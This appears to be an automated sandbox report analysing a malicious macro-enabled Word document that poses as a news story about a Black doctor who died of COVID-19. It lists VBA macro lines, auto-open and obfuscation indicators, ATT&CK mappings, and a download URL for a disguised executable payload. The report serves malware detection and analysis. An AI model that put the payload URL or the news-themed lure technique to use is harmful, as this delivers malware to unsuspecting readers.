Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain: " & objItem.Domain
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Key Name: " & objItem.KeyName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Maps: " & objItem.Maps
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC Site Name: " & objItem.DcSiteName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Description: " & objItem.Description
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address: " & objItem.DomainControllerAddress
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Address Type: " & objItem.DomainControllerAddressType
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain GUID: " & objItem.DomainGuid
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Domain Name: " & objItem.DomainName
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Kerberos Distribution Center Flag: " & objItem.DSKerberosDistributionCenterFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Primary Domain Controller Flag: " & objItem.DSPrimaryDomainControllerFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Name: " & objItem.Name
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "DC: " & objItem.DC
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Wscript.Echo "Default: " & objItem.Default
Document contains an embedded VBA with base64 encoded stringsShow sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function maisLixo, String ntSecurityDescriptor
Document contains an embedded VBA with functions possibly related to ADO stream file operationsShow sources
Source: Medica negra morre covid-19 apos racismo.docmStream path 'VBA/ThisDocument' : found possibly 'ADODB.Stream' functions loadfromfile, open, read, readtext, savetofile, write, writetext
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function charset, found possibly 'ADODB.Stream' functions loadfromfile, open, readName: charset
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function CheckValidUtf8, found possibly 'ADODB.Stream' functions loadfromfile, open, readName: CheckValidUtf8
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)Show sources
Source: Medica negra morre covid-19 apos racismo.docmStream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, exec, expandenvironmentstrings, regread, run, environ
Source: Medica negra morre covid-19 apos racismo.docmOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator, VBA macros: true
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator has summary info: false
Source: Medica negra morre covid-19 apos racismo.docmOLE indicator application name: unknown
Source: classification engineClassification label: mal68.expl.evad.winDOCM@1/8@0/0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$dica negra morre covid-19 apos racismo.docmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD95D.tmpJump to behavior
Source: Medica negra morre covid-19 apos racismo.docmOLE document summary: title field not present or empty
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: Medica negra morre covid-19 apos racismo.docmStream path 'VBA/ThisDocument' : High number of string operations
Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisDocumentName: ThisDocument
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting62Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting62LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Medica negra morre covid-19 apos racismo.docm100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://bitbucket.org/seveca-emilia/onemoreslave/downloads/defenderModule.exevbaProject.binfalse
    high

    Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:334232
    Start date:27.12.2020
    Start time:08:50:26
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 13m 14s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Medica negra morre covid-19 apos racismo.docm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:2
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • HDC enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.expl.evad.winDOCM@1/8@0/0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .docm
    Warnings:
    Show All
    • Max analysis timeout: 720s exceeded, the analysis took too long
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE00EB8A.png
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:PNG image data, 633 x 572, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):1690
    Entropy (8bit):3.576194053118268
    Encrypted:false
    SSDEEP:6:6v/lhPVVUZMR/sJToIHnljkh5s+qbfyfkHW7lsYP5m0irXirXirXirXirXirXire:6v/7t6e/Ya/qb60uW0gb4L4VA
    MD5:91399F6981993D43FE517DB9466CC5E6
    SHA1:01A31179D55BF574E603C9DDDF2481180DB950CA
    SHA-256:D43C41B95F8C6F9082326926B4003F74762F61B00BC920E0FD7D6AD87BBF1874
    SHA-512:7455DF80D45C830D1032D7834BE89B20503E19B9CB3084010DCFC165719BA9D0A53C6EB5C898F3552EA5E5C92BB7B271889E666D28700C81C732844953637EA8
    Malicious:false
    Reputation:low
    Preview: .PNG........IHDR...y...<......BML....sRGB.........gAMA......a....9PLTE......fffddd......{{{dddvvv...ccc...eee......dddeeeddd...T..5....tRNS..<@..............3......pHYs..........&.?....IDATx^.....P..@.....b.&~.35.eZ_+..X..z..`......{~.GAy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.GCy4.
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCB4583-025D-4403-9DBE-B492A11253DC}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C53DB071-4F03-422B-8C5C-F1ADB98D2678}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.356508177135833
    Encrypted:false
    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbl:IiiiiiiiiifdLloZQc8++lsJe1MzW5
    MD5:63907C51D6F530F1ECE8F240FC719BC7
    SHA1:EE5BFCB615BF43440C2262D9266CD55C72C52D3D
    SHA-256:DC5611070E3ACD156404C5E9FC49DD729A8D1A1055285F878DD896A2C1485F17
    SHA-512:AECDEBBF4D94D3C0E10DDD0767CA5909021ED714C9BF9CF62D6F129A4D8DD31489C1E105D150A392A9EF54290501CDA9437034DE0F480EE8304051BC36EC7B15
    Malicious:false
    Reputation:low
    Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EC948C2F-5218-4A38-A66D-F6FECB16C1E9}.tmp
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):75264
    Entropy (8bit):3.422628230012359
    Encrypted:false
    SSDEEP:384:guul7LwFLvGrLXGQaLRljGVRLAWGUBLVKGDcyfLYMCmGb6GGGmLLG/LH7LeL//GJ:wcycMC7jMY5
    MD5:0415A3670C31CA40C9D01C0A9EC563EC
    SHA1:1C72CA1DFD99965CA3B72C9C7579F2DA40A616FF
    SHA-256:BE33D0D5B888404F9259DBC68C3CFF52E1E9EEDDBD79F0D81ED4443BB00DE660
    SHA-512:7860305DBDD87607590650CBB9998A05682905065E142D59C70ACBA0BBC0D5899019CBA1E6AC3FF21F09AE1E7002330A62032DFFC8B2FED69F9088F1E2AC6629
    Malicious:false
    Reputation:low
